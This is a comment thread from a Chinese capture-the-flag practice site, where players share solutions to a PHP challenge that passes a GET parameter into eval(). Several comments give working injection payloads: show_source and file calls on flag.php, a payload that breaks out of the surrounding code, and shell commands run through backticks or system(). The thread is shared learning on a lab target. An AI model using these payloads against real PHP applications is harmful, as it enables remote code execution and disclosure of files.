评分(10)
解题动态
18996315220 攻破了该题 3小时前
BLX123 攻破了该题 11小时前
xjn12 攻破了该题 15小时前
SDLbyZ 攻破了该题 15小时前
771232546 攻破了该题 17小时前
19941759966 攻破了该题 18小时前
lancertyk 攻破了该题 1天前
zdabajfk 攻破了该题 1天前
---snow--- 攻破了该题 1天前
1293273679 攻破了该题 1天前
homniloquy 攻破了该题 1天前
violet06 攻破了该题 1天前
Oliver23 攻破了该题 2天前
wwwwzh123 攻破了该题 2天前
sdxsdxl 攻破了该题 2天前
yaoyao0 攻破了该题 2天前
白露早 攻破了该题 2天前
liberator 攻破了该题 2天前
nidexun 攻破了该题 2天前
评论
kavin 4年前
举报
明白了原理,用bp搞了一轮,发现hello=show_source('flag.php')可行
kuaiting 4年前
举报
使用?hello=file('flag.php') 或者?hello=show_source('flag.php') 等可以读取源码的函数 或者构造var_dump($a) 闭合
陈江川0118 4年前
举报
简单来说就是利用file函数把flag.php的内容存到一个数组中,然后打印出来数组的内容即可
trackboy 4年前
举报
?hello=file(%22flag.php%22) ?hello=file_get_contents(%27flag.php%27) ?hello=1);show_source(%27flag.php%27);var_dump( ?hello=);echo%20`cat%20./flag.php`;//
lgb236277484 4年前
举报
highlight_file()
mingshen 4年前
举报
PHP show_source() 杂项函数,或者file协议读取文件内容
linkzoom 4年前
举报
离谱,cat啥啊真的是...
ctf20210817 4年前
举报
确实是cat就可以
kunge 4年前
举报
基础不牢,地动山摇,以前用过tac,今天怎么也想不起来。感谢使用file()函数哪位大哥,感谢对tac与cat进行分别讲解的大哥,学到了很多
finti 4年前
举报
此题考察php相关,include是将flag.php文件包含进页面代码,顺便提示做题人flag位置,$request可用与接受get和post的传递的参数,eval函数可以把字符串作为php命令执行,知道这些你就可以用get方法传递hello变量,并在hello其中写入查看flag.php的命令了
会煮面999 4年前
举报
直接使用system("grep -nr flag{ /")暴力搜索hhh :)